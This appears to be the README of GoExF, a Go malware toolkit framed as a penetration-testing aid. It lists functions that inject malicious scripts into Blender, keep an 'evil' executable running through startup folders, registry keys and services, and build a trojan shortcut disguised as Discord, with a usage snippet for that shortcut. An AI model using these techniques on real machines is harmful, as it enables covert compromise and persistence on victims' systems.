GoExF is a collection of Golang modules that can be used to aid penetration testers during all phases of an assessment. GoExF is comprised of the following modules and scripts:
Installation
git clone https://github.com/F-r-o-i-d/GoExF
in your projet directories
- main.go
- go.mod
- go.sum
- GoExF
- GoSploit
- EvilFile
- InfectApp
- StartUp.go
- GoSploit
main.go
package main
import (
"<yourpackage>/GoExF/GoSploit" // ex
)
func main() {
GoSploit.Initialize()
}
🔴 -> need Admin 🟢 -> Admin not required ⚫ -> Visible to target ⚪ -> Invisible to target
CodeInjection
Execute code on a target machine.
<yourpackage>/GoExF/GoSploit/InfectApp
– InfectApp.InfectBlender(
payload )
[🔴⚪]
Injects a malicious script (batch) in blender code
Persistance
Make evil program stuck on the target machine.
<yourpackage>/GoExF/GoSploit
– GoSploit.StartUpWdirectories()
[🟢⚫]
copy evil .exe -> shell:startup
– GoSploit.StartUpWdregedit()
[🔴⚫]
create key regedit to launch exe at startup
– GoSploit.StartUpWservice(ServiceName)
[🔴⚪]
create a service to launch exe at startup
Trojan
Make evil file hiden to look like something good.
import EvilFile "<yourpackage>/GoExF/GoSploit/EvilFile"
– EvilFile.Lnk [🟢⚫]
Discord := EvilFile.Lnk{
Name: "Discord.lnk",
Payload: "evilCode",
Path: "$home\\Desktop\\",
Interface: "cmd.exe / powershell.exe",
IconPath: "Discord.exe path / Discord.ico path",
Description: "Discord ShortCut",
}
Discord.Build()